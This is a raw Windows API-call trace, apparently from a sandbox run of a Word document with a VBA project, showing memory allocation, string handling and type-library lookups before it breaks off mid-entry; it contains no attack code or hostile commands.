IMalloc:Alloc (This=0x7ffd098ff3f0, cb=0x3c) returned 0x1d39d7b3160 [0059.126] IMalloc:Free (This=0x7ffd098ff3f0, pv=0x1d39d84ec00) [0059.126] IMalloc:Alloc (This=0x7ffd098ff3f0, cb=0x20) returned 0x1d3982158e0 [0059.126] IMalloc:Realloc (This=0x7ffd098ff3f0, pv=0x1d3982158e0, cb=0x68) returned 0x1d39d84dee0 [0059.126] IMalloc:Free (This=0x7ffd098ff3f0, pv=0x1d39d7b3160) [0059.126] wcsncpy_s (in: _Destination=0x33e4fb4010, _SizeInWords=0x108, _Source="*\\G{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52}#2.8#0#C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE16\\MSO.DLL#Microsoft Office 16.0 Object Library", _MaxCount=0x106 | out: _Destination="*\\G{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52}#2.8#0#C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE16\\MSO.DLL#Microsoft Office 16.0 Object Library") returned 0x0 [0059.126] CharLowerBuffW (in: lpsz="*\\G{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52}#2.8#0#C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE16\\MSO.DLL#Microsoft Office 16.0 Object Library", cchLength=0x94 | out: lpsz="*\\g{2df8d04c-5bfa-101b-bde5-00aa0044de52}#2.8#0#c:\\program files\\common files\\microsoft shared\\office16\\mso.dll#microsoft office 16.0 object library") returned 0x94 [0059.126] IMalloc:Alloc (This=0x7ffd098ff3f0, cb=0x12a) returned 0x1d39d9c3a20 [0059.126] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="*\\g{2df8d04c-5bfa-101b-bde5-00aa0044de52}#2.8#0#c:\\program files\\common files\\microsoft shared\\office16\\mso.dll#microsoft office 16.0 object library", cchWideChar=149, lpMultiByteStr=0x1d39d9c3a20, cbMultiByte=298, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="*\\g{2df8d04c-5bfa-101b-bde5-00aa0044de52}#2.8#0#c:\\program files\\common files\\microsoft shared\\office16\\mso.dll#microsoft office 16.0 object library", lpUsedDefaultChar=0x0) returned 149 [0059.126] IMalloc:Free (This=0x7ffd098ff3f0, pv=0x1d39d9c3a20) [0059.126] wcscpy_s (in: _Destination=0x1d39d7de760, _SizeInWords=0x95, _Source="*\\G{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52}#2.8#0#C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE16\\MSO.DLL#Microsoft Office 16.0 Object Library" | out: _Destination="*\\G{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52}#2.8#0#C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE16\\MSO.DLL#Microsoft Office 16.0 Object Library") returned 0x0 [0059.126] wcsncpy_s (in: _Destination=0x33e4fb4050, _SizeInWords=0x108, _Source="*\\G{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52}#2.8#0#C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE16\\MSO.DLL#Microsoft Office 16.0 Object Library", _MaxCount=0x106 | out: _Destination="*\\G{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52}#2.8#0#C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE16\\MSO.DLL#Microsoft Office 16.0 Object Library") returned 0x0 [0059.126] CharLowerBuffW (in: lpsz="*\\G{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52}#2.8#0#C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE16\\MSO.DLL#Microsoft Office 16.0 Object Library", cchLength=0x94 | out: lpsz="*\\g{2df8d04c-5bfa-101b-bde5-00aa0044de52}#2.8#0#c:\\program files\\common files\\microsoft shared\\office16\\mso.dll#microsoft office 16.0 object library") returned 0x94 [0059.126] IMalloc:Alloc (This=0x7ffd098ff3f0, cb=0x12a) returned 0x1d39d9c4560 [0059.126] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="*\\g{2df8d04c-5bfa-101b-bde5-00aa0044de52}#2.8#0#c:\\program files\\common files\\microsoft shared\\office16\\mso.dll#microsoft office 16.0 object library", cchWideChar=149, lpMultiByteStr=0x1d39d9c4560, cbMultiByte=298, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="*\\g{2df8d04c-5bfa-101b-bde5-00aa0044de52}#2.8#0#c:\\program files\\common files\\microsoft shared\\office16\\mso.dll#microsoft office 16.0 object library", lpUsedDefaultChar=0x0) returned 149 [0059.126] IMalloc:Free (This=0x7ffd098ff3f0, pv=0x1d39d9c4560) [0059.126] wcsncpy_s (in: _Destination=0x33e4fb4010, _SizeInWords=0x108, _Source="*\\CNormal", _MaxCount=0x106 | out: _Destination="*\\CNormal") returned 0x0 [0059.126] CharLowerBuffW (in: lpsz="*\\CNormal", cchLength=0x9 | out: lpsz="*\\cnormal") returned 0x9 [0059.126] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="*\\cnormal", cchWideChar=10, lpMultiByteStr=0x33e4fb3f40, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="*\\cnormal", lpUsedDefaultChar=0x0) returned 10 [0059.126] _wcsicmp (_String1="*\\CNormal", _String2="*\\CNormal") returned 0 [0059.126] IUnknown:AddRef (This=0x1d3985c5700) returned 0x4 [0059.126] IUnknown:QueryInterface (in: This=0x1d3985c5700, riid=0x7ffce0bccce8*(Data1=0xcacc1e8a, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x33e4fb4438 | out: ppvObject=0x33e4fb4438*=0x0) returned 0x80004002 [0059.126] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Office", cchWideChar=7, lpMultiByteStr=0x33e4fb4400, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Office", lpUsedDefaultChar=0x0) returned 7 [0059.126] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="Office") returned 0x507515 [0059.126] IUnknown:Release (This=0x1d3985c5700) returned 0x3 [0059.126] IUnknown:Release (This=0x1d3985c5700) returned 0x2 [0059.127] SysStringByteLen (bstr="潎浲污") returned 0x6 [0059.127] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1d398543678, cbMultiByte=6, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 6 [0059.127] SysStringByteLen (bstr="潎浲污") returned 0x6 [0059.127] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1d398543678, cbMultiByte=7, lpWideCharStr=0x1d398218cd8, cchWideChar=7 | out: lpWideCharStr="Normal") returned 7 [0059.127] IMalloc:Alloc (This=0x7ffd098ff3f0, cb=0xa8) returned 0x1d398705720 [0059.127] IMalloc:Alloc (This=0x7ffd098ff3f0, cb=0x7f40) returned 0x1d39d8e7b00 [0059.127] IMalloc:Alloc (This=0x7ffd098ff3f0, cb=0x30) returned 0x1d39d44c720 [0059.127] IMalloc:Alloc (This=0x7ffd098ff3f0, cb=0x60) returned 0x1d39d84e500 [0059.129] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ThisDocument", cchWideChar=13, lpMultiByteStr=0x33e4fb46e0, cbMultiByte=26, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ThisDocument", lpUsedDefaultChar=0x0) returned 13 [0059.129] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="ThisDocument") returned 0x509e3c [0059.129] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ThisDocument", cchWideChar=13, lpMultiByteStr=0x33e4fb46c0, cbMultiByte=26, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ThisDocument", lpUsedDefaultChar=0x0) returned 13 [0059.129] LHashValOfNameSysA (syskind=0x1, lcid=0x412, szName="ThisDocument") returned 0x509e3c [0059.129] IMalloc:Alloc (This=0x7ffd098ff3f0, cb=0x8) returned 0x1d39d4a7f40 [0059.129] qsort (in: _Base=0x1d39d4a7f40, _NumOfElements=0x1, _SizeOfElements=0x8, _PtFuncCompare=0x7ffce0869a58 | out: _Base=0x1d39d4a7f40) [0059.129] bsearch (_Key=0x33e4fb3618, _Base=0x1d39d4a7f40, _NumOfElements=0x1, _SizeOfElements=0x8, _PtFuncCompare=0x7ffce0869a58) returned 0x1d39d4a7f40 [0059.129] CompareStringA (Locale=0x412, dwCmpFlags=0x30001, lpString1="ThisDocument", cchCount1=-1, lpString2="ThisDocument", cchCount2=-1) returned 2 [0059.162] IUnknown:AddRef (This=0x1d3980663b0) returned 0x4 [0059.162] ITypeLib:RemoteGetDocumentation (in: This=0x1d3980663b0, index=-1, refPtrFlags=0xe4fb54d8, pBstrName=0x0, pBstrDocString=0x0, pdwHelpContext=0x0, pBstrHelpFile=0x33e4fb5501 | out: pBstrName=0x0, pBstrDocString=0x0, pdwHelpContext=0x0, pBstrHelpFile=0x33e4fb5501) returned 0x0 [0059.162] CompareStringW (Locale=0x409, dwCmpFlags=0x1, lpString1="VBA", cchCount1=3, lpString2="Normal", cchCount2=6) returned 3 [0059.162] IUnknown:Release (This=0x1d3980663b0) returned 0x3 [0059.162] IUnknown:AddRef (This=0x1d3985c4c00) returned 0x9 [0059.162] ITypeLib:RemoteGetDocumentation (in: This=0x1d3985c4c00, index=-1, refPtrFlags=0xe4fb54d8, pBstrName=0x0, pBstrDocString=0x0, pdwHelpContext=0x0, pBstrHelpFile=0x33e4fb5501 | out: pBstrName=0x0, pBstrDocString=0x0, pdwHelpContext=0x0, pBstrHelpFile=0x33e4fb5501) returned 0x0 [0059.162] CompareStringW (Locale=0x409, dwCmpFlags=0x1, lpString1="Word", cchCount1=4, lpString2="Normal", cchCount2=6) returned 3 [0059.162] IUnknown:Release (This=0x1d3985c4c00) returned 0x8 [0059.162] IUnknown:AddRef (This=0x1d3980655f0) returned 0x6 [0059.162] ITypeLib:RemoteGetDocumentation (in: This=0x1d3980655f0, index=-1, refPtrFlags=0xe4fb54d8, pBstrName=0x0, pBstrDocString=0x0, pdwHelpContext=0x0, pBstrHelpFile=0x33e4fb5501 | out: pBstrName=0x0, pBstrDocString=0x0, pdwHelpContext=0x0, pBstrHelpFile=0x33e4fb5501) returned 0x0 [0059.162] CompareStringW (Locale=0x409, dwCmpFlags=0x1, lpString1="stdole", cchCount1=6, lpString2="Normal", cchCount2=6) returned 3 [0059.162] IUnknown:Release (This=0x1d3980655f0) returned 0x5 [0059.162] wcscpy_s (in: _Destination=0x1d398543678, _SizeInWords=0xa, _Source="*\\CNormal" | out: _Destination="*\\CNormal") returned 0x0 [0059.162] wcsncpy_s (in: _Destination=0x33e4fb4df0, _SizeInWords=0x108, _Source="*\\CNormal", _MaxCount=0x106 | out: _Destination="*\\CNormal") returned 0x0 [0059.162] CharLowerBuffW (in: lpsz="*\\CNormal", cchLength=0x9 | out: lpsz="*\\cnormal") returned 0x9 [0059.162] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="*\\cnormal", cchWideChar=10, lpMultiByteStr=0x33e4fb4d20, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="*\\cnormal", lpUsedDefaultChar=0x0) returned 10 [0059.162] _wcsicmp (_String1="*\\CNormal", _String2="*\\CNormal") returned 0 [0059.163] SysStringByteLen (bstr="潎浲污") returned 0x6 [0059.163] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1d398543678, cbMultiByte=6, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 6 [0059.163] SysStringByteLen (bstr="潎浲污") returned 0x6 [0059.163] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1d398543678, cbMultiByte=7, lpWideCharStr=0x1d398218cd8, cchWideChar=7 | out: lpWideCharStr="Normal") returned 7 [0059.163] CompareStringW (Locale=0x409, dwCmpFlags=0x1, lpString1="Normal", cchCount1=6, lpString2="Normal", cchCount2=6) returned 2 [0059.163] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ThisDocument", cchWideChar=13, lpMultiByteStr=0x33e4fb5430, cbMultiByte=26, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ThisDocument", lpUsedDefaultChar=0x0) returned 13 [0059.163] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="ThisDocument") returned 0x509e3c [0059.164] IMalloc:Free (This=0x7ffd098ff3f0, pv=0x1d39d44ce60) [0059.166] SysStringByteLen (bstr="牐橯捥t") returned 0x7 [0059.166] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1d398543678, cbMultiByte=7, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 7 [0059.166] SysStringByteLen (bstr="牐橯捥t") returned 0x7 [0059.166] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1d398543678, cbMultiByte=8, lpWideCharStr=0x1d398218cd8, cchWideChar=8 | out: lpWideCharStr="Project") returned 8 [0059.166] SysStringByteLen (bstr="牐橯捥t") returned 0x7 [0059.166] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1d398543678, cbMultiByte=7, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 7 [0059.166] SysStringByteLen (bstr="牐橯捥t") returned 0x7 [0059.166] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1d398543678, cbMultiByte=8, lpWideCharStr=0x1d398543198, cchWideChar=8 | out: lpWideCharStr="Project") returned 8 [0059.166] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Project", cchWideChar=-1, lpMultiByteStr=0x33e4fb4a90, cbMultiByte=2043, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Project", lpUsedDefaultChar=0x0) returned 8 [0059.166] lstrlenA (lpString="Project") returned 7 [0059.166] lstrcatA (in: lpString1="Project", lpString2=" (" | out: lpString1="Project (") returned="Project (" [0059.167] strncat_s (in: _Destination="Project (", _SizeInBytes=0x902, _Source="1", _MaxCount=0x28 | out: _Destination="Project (1") returned 0x0 [0059.167] lstrcatA (in: lpString1="Project (1", lpString2=")" | out: lpString1="Project (1)") returned="Project (1)" [0059.167] IMalloc:Alloc (This=0x7ffd098ff3f0, cb=0xa8) returned 0x1d3987072a0 [0059.167] IMalloc:Alloc (This=0x7ffd098ff3f0, cb=0x30) returned 0x1d39d44c8e0 [0059.167] IMalloc:Alloc (This=0x7ffd098ff3f0, cb=0x60) returned 0x1d39d84d930 [0059.167] IMalloc:Alloc (This=0x7ffd098ff3f0, cb=0xa8) returned 0x1d398707c40 [0059.167] IMalloc:Alloc (This=0x7ffd098ff3f0, cb=0x30) returned 0x1d39d44ca60 [0059.630] SysStringByteLen (bstr="牐橯捥t") returned 0x7 [0059.630] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1d398543678, cbMultiByte=7, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 7 [0059.630] SysStringByteLen (bstr="牐橯捥t") returned 0x7 [0059.630] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1d398543678, cbMultiByte=8, lpWideCharStr=0x1d398543198, cchWideChar=8 | out: lpWideCharStr="Project") returned 8 [0059.630] free (_Block=0x1d39bde9fc0) [0059.630] SysStringByteLen (bstr="牐橯捥t") returned 0x7 [0059.630] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1d398543678, cbMultiByte=7, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 7 [0059.630] SysStringByteLen (bstr="牐橯捥t") returned 0x7 [0059.630] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1d398543678, cbMultiByte=8, lpWideCharStr=0x1d398218cd8, cchWideChar=8 | out: lpWideCharStr="Project") returned 8 [0059.630] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Project", cchWideChar=-1, lpMultiByteStr=0x33e4fb4f10, cbMultiByte=2043, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Project", lpUsedDefaultChar=0x0) returned 8 [0059.630] lstrlenA (lpString="Project") returned 7 [0059.630] lstrcatA (in: lpString1="Project", lpString2=" (" | out: lpString1="Project (") returned="Project (" [0059.630] strncat_s (in: _Destination="Project (", _SizeInBytes=0x902, _Source="1", _MaxCount=0x28 | out: _Destination="Project (1") returned 0x0 [0059.630] lstrcatA (in: lpString1="Project (1", lpString2=")" | out: lpString1="Project (1)") returned="Project (1)" [0060.155] IMalloc:Alloc (This=0x7ffd098ff3f0, cb=0x0) returned 0x1d39d4a9630 [0060.155] IUnknown:QueryInterface (in: This=0x1d39d552a68, riid=0x7ffce0bcc368*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x33e4fb6c80 | out: ppvObject=0x33e4fb6c80*=0x0) returned 0x80004002 [0060.156] IUnknown:QueryInterface (in: This=0x1d39d552a68, riid=0x7ffce0bca878*(Data1=0x20412, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x33e4fb6bc8 | out: ppvObject=0x33e4fb6bc8*=0x1d39d552a68) returned 0x0 [0060.156] ITypeInfo2:GetCustData (in: This=0x1d39d552a68, GUID=0x7ffce0bd5de0*(Data1=0xba65d790, Data2=0x9301, Data3=0x11cf, Data4=([0]=0x8d, [1]=0x22, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x37, [6]=0x53, [7]=0x84)), pVarVal=0x33e4fb6bd8 | out: pVarVal=0x33e4fb6bd8*(varType=0x0, wReserved1=0xe4fb, wReserved2=0x33, wReserved3=0x0, varVal1=0x0, varVal2=0x800000000)) returned 0x0 [0060.156] IUnknown:Release (This=0x1d39d552a68) returned 0x2 [0060.156] ITypeInfo:RemoteGetDocumentation (in: This=0x1d39d552a68, memid=-1, refPtrFlags=0xe4fb6bd0, pBstrName=0x0, pBstrDocString=0x0, pdwHelpContext=0x0, pBstrHelpFile=0x33e4fb6bf0 | out: pBstrName=0x0, pBstrDocString=0x0, pdwHelpContext=0x0, pBstrHelpFile=0x33e4fb6bf0*="") returned 0x0 [0060.156] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Document", cchWideChar=9, lpMultiByteStr=0x33e4fb6ae0, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Document", lpUsedDefaultChar=0x0) returned 9 [0060.156] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="Document") returned 0x50d36a [0060.156] ITypeInfo:RemoteGetTypeAttr (in: This=0x1d39d552b18, ppTypeAttr=0x33e4fb6bd0, pDummy=0x0 | out: ppTypeAttr=0x33e4fb6bd0, pDummy=0x0) returned 0x0 [0060.156] ITypeInfo:LocalReleaseTypeAttr (This=0x1d39d552b18) returned 0x0 [0060.156] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x0, ppFuncDesc=0x33e4fb6ba8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6ba8, pDummy=0x6) returned 0x0 [0060.156] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.156] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x1, ppFuncDesc=0x33e4fb6ba8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6ba8, pDummy=0x6) returned 0x0 [0060.156] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.156] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x2, ppFuncDesc=0x33e4fb6ba8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6ba8, pDummy=0x6) returned 0x0 [0060.156] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.156] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x3, ppFuncDesc=0x33e4fb6ba8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6ba8, pDummy=0x6) returned 0x0 [0060.156] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.156] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x4, ppFuncDesc=0x33e4fb6ba8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6ba8, pDummy=0x6) returned 0x0 [0060.156] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.156] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x5, ppFuncDesc=0x33e4fb6ba8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6ba8, pDummy=0x6) returned 0x0 [0060.156] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.156] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x6, ppFuncDesc=0x33e4fb6ba8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6ba8, pDummy=0x6) returned 0x0 [0060.156] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.156] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x7, ppFuncDesc=0x33e4fb6ba8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6ba8, pDummy=0x6) returned 0x0 [0060.156] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.157] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x8, ppFuncDesc=0x33e4fb6ba8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6ba8, pDummy=0x6) returned 0x0 [0060.157] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.157] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x9, ppFuncDesc=0x33e4fb6ba8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6ba8, pDummy=0x6) returned 0x0 [0060.157] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.157] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0xa, ppFuncDesc=0x33e4fb6ba8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6ba8, pDummy=0x6) returned 0x0 [0060.157] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.157] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0xb, ppFuncDesc=0x33e4fb6ba8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6ba8, pDummy=0x6) returned 0x0 [0060.157] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.157] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0xc, ppFuncDesc=0x33e4fb6ba8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6ba8, pDummy=0x6) returned 0x0 [0060.157] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.157] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0xd, ppFuncDesc=0x33e4fb6ba8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6ba8, pDummy=0x6) returned 0x0 [0060.157] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.157] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0xe, ppFuncDesc=0x33e4fb6ba8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6ba8, pDummy=0x6) returned 0x0 [0060.157] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.157] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0xf, ppFuncDesc=0x33e4fb6ba8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6ba8, pDummy=0x6) returned 0x0 [0060.157] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.157] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x10, ppFuncDesc=0x33e4fb6ba8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6ba8, pDummy=0x6) returned 0x0 [0060.157] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.157] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x11, ppFuncDesc=0x33e4fb6ba8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6ba8, pDummy=0x6) returned 0x0 [0060.157] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.157] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x12, ppFuncDesc=0x33e4fb6ba8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6ba8, pDummy=0x6) returned 0x0 [0060.157] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.157] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x13, ppFuncDesc=0x33e4fb6ba8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6ba8, pDummy=0x6) returned 0x0 [0060.157] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.157] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x14, ppFuncDesc=0x33e4fb6ba8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6ba8, pDummy=0x6) returned 0x0 [0060.157] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.157] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x15, ppFuncDesc=0x33e4fb6ba8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6ba8, pDummy=0x6) returned 0x0 [0060.157] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.157] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x16, ppFuncDesc=0x33e4fb6ba8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6ba8, pDummy=0x6) returned 0x0 [0060.157] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.157] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x17, ppFuncDesc=0x33e4fb6ba8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6ba8, pDummy=0x6) returned 0x0 [0060.157] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.157] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x18, ppFuncDesc=0x33e4fb6ba8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6ba8, pDummy=0x6) returned 0x0 [0060.157] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.157] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x19, ppFuncDesc=0x33e4fb6ba8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6ba8, pDummy=0x6) returned 0x0 [0060.157] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.157] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x1a, ppFuncDesc=0x33e4fb6ba8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6ba8, pDummy=0x6) returned 0x0 [0060.157] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.157] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x1b, ppFuncDesc=0x33e4fb6ba8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6ba8, pDummy=0x6) returned 0x0 [0060.157] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.157] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x1c, ppFuncDesc=0x33e4fb6ba8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6ba8, pDummy=0x6) returned 0x0 [0060.157] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.158] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x1d, ppFuncDesc=0x33e4fb6ba8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6ba8, pDummy=0x6) returned 0x0 [0060.158] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.158] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x1e, 